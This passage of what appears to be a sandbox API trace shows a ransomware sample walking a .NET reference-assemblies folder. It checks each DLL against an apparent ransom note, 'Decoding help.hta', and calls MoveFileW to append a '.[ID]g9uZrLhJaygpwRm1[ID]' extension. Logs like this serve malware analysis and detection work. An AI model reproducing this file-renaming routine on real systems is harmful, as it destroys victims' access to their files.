Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.ComponentModel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.componentmodel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.097] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44d88e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb44d88e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb44d88e8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Workflow.Runtime.dll", cAlternateFileName="")) returned 1 [0058.097] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.097] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.097] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Workflow.Runtime.dll") returned -1 [0058.097] lstrlenW (lpString="System.Workflow.Runtime.dll") returned 27 [0058.097] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.097] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="System.Workflow.Runtime.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" [0058.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" [0058.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Runtime.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.runtime.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.098] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7231257, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x7231257, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7ae0ebbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x2a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationClient.dll", cAlternateFileName="")) returned 1 [0058.098] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.098] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.098] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationClient.dll") returned -1 [0058.098] lstrlenW (lpString="UIAutomationClient.dll") returned 22 [0058.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.098] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationClient.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" [0058.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" [0058.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClient.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclient.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.098] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x752adc3, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x752adc3, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7b23923c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x5d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationClientsideProviders.dll", cAlternateFileName="")) returned 1 [0058.098] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.098] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.098] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationClientsideProviders.dll") returned -1 [0058.099] lstrlenW (lpString="UIAutomationClientsideProviders.dll") returned 35 [0058.099] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0058.099] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.099] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.099] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationClientsideProviders.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" [0058.099] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" [0058.099] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationClientsideProviders.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationclientsideproviders.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.099] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778c3b3, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x778c3b3, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7b532dbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationProvider.dll", cAlternateFileName="")) returned 1 [0058.099] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.099] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.099] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.099] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationProvider.dll") returned -1 [0058.099] lstrlenW (lpString="UIAutomationProvider.dll") returned 24 [0058.099] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.099] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.099] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationProvider.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" [0058.099] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" [0058.099] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.100] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a39c61, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x7a39c61, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7b5a51dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UIAutomationTypes.dll", cAlternateFileName="")) returned 1 [0058.100] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.100] lstrcmpiW (lpString1="Decoding help.hta", lpString2="UIAutomationTypes.dll") returned -1 [0058.100] lstrlenW (lpString="UIAutomationTypes.dll") returned 21 [0058.100] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="UIAutomationTypes.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" [0058.100] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" [0058.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.100] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa262a3d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xaa262a3d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xaa49dee1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x132000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsBase.dll", cAlternateFileName="")) returned 1 [0058.100] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.100] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0058.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0058.101] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WindowsBase.dll") returned -1 [0058.101] lstrlenW (lpString="WindowsBase.dll") returned 15 [0058.101] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.101] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 76 [0058.101] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="WindowsBase.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" [0058.101] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" [0058.101] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.101] FindNextFileW (in: hFindFile=0x5d7fd0, lpFindFileData=0x1781fd30 | out: lpFindFileData=0x1781fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c58b5, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0x80c58b5, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0x7b91117c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsFormsIntegration.dll", cAlternateFileName="")) returned 1 [0058.101] lstrcpyW (in: lpString1=0x24e46d28, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0058.101] lstrlenW 